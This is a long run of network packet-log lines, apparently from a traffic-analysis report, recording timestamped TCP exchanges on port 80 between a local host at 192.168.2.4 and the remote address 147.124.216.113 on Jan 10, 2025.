              Jan 10, 2025 08:59:05.726279020 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726330042 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726362944 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726372004 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726372957 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726413965 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726447105 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726457119 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726480961 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726512909 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726524115 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726546049 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726583958 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726596117 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726632118 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726664066 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726670027 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726700068 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726727962 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726747036 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726758957 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726794004 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726794958 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726825953 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726859093 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726871014 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726912975 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726944923 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.726952076 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.726977110 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727010012 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727010965 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727049112 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727082014 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727089882 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727114916 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727148056 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727153063 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727180004 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727215052 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727225065 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727370977 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727402925 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727416039 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727437019 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727468967 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727478027 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727502108 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727535963 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727545023 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727570057 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727602959 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727612972 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727636099 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727667093 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727674007 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727703094 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727744102 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727855921 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727888107 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727920055 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727930069 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.727952957 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727986097 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.727993965 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728018045 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728049994 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728059053 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728082895 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728116989 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728120089 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728148937 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728182077 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728182077 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728260994 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728292942 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728300095 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728327036 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728358030 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728360891 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728389978 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728423119 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728429079 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728455067 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728492975 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728581905 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728614092 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728646994 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728653908 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728678942 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728718996 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728741884 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728775024 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728806973 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728816032 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728838921 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728872061 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728878975 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728905916 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728938103 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.728945017 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.728971004 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729002953 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729011059 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729037046 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729074955 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729084969 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729383945 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729417086 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729428053 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729449987 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729481936 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729491949 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729515076 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729547024 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729552984 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729578972 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729610920 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729614973 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729644060 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729674101 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729675055 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729708910 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729739904 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729753017 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729773045 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729804993 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729809046 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729837894 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.729873896 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.729875088 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730134010 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730165958 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730190992 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.730199099 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730231047 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730242014 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.730263948 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730295897 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730304003 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.730329037 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730360985 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730370045 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.730393887 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730424881 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730432034 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.730458021 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730489016 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730489969 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.730521917 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.730562925 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.765203953 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765249014 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765304089 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765338898 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765372038 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765405893 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.765407085 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.765443087 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765477896 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765491009 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.765510082 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765544891 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765552998 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:05.765580893 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:05.765620947 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.250960112 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251010895 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251046896 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251080990 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251115084 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251147985 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251158953 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251158953 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251182079 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251214027 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251241922 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251249075 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251257896 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251281023 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251336098 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251349926 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251369953 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251403093 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251418114 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251434088 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251467943 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251492023 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251502991 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251534939 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251548052 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251568079 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251599073 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251626968 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251631021 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251667976 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251672983 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251836061 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251869917 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251895905 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251903057 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251935005 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.251948118 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.251969099 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252002001 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252022982 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252033949 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252065897 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252073050 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252099037 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252130032 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252161026 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252165079 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252218962 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252368927 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252402067 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252434015 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252448082 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252466917 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252516985 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252540112 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252573967 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252615929 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252624989 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252660990 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252693892 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252702951 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252727032 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252758980 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252767086 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252790928 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252823114 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252849102 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252856970 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252892017 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252903938 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252923965 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252958059 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.252971888 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.252989054 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.253021955 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.253034115 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.253055096 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.253088951 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.253097057 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.253117085 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.253173113 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:07.253252029 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.253285885 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:07.253335953 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402240038 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402302980 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402339935 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402373075 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402406931 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402439117 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402472973 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402506113 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402512074 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402513027 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402513027 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402539015 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402570963 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402606010 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402638912 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402672052 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402678967 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402678967 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402678967 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402709007 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402750015 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402782917 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402798891 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402820110 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402833939 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402854919 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402887106 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402908087 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.402919054 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402951956 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.402985096 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403004885 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403017998 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403037071 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403047085 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403080940 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403095007 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403114080 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403146982 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403160095 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403181076 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403213978 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403234959 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403248072 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403280973 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403301001 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403342962 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403386116 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403410912 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403419018 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403450966 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403476000 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403484106 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403517008 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403531075 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403549910 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403580904 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403590918 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403614044 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403645992 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403670073 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403677940 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403711081 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403723955 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403744936 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403775930 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403800964 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403810978 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403842926 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403856993 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403877974 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403909922 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403932095 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.403943062 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403980017 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.403990030 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.404089928 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.404123068 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.404146910 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.404156923 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.404190063 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.404201984 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:08.404223919 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:08.404273987 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.103224993 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103297949 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103368044 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103420019 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103454113 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103487968 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103521109 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103554010 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103586912 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103590012 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.103590965 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.103590965 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.103636980 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103668928 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103702068 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103734970 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103740931 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.103740931 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.103766918 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103769064 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.103800058 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103833914 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103868961 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103899956 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103933096 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103965044 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.103997946 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104029894 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104063034 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104069948 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104094982 CET8049736147.124.216.113192.168.2.4
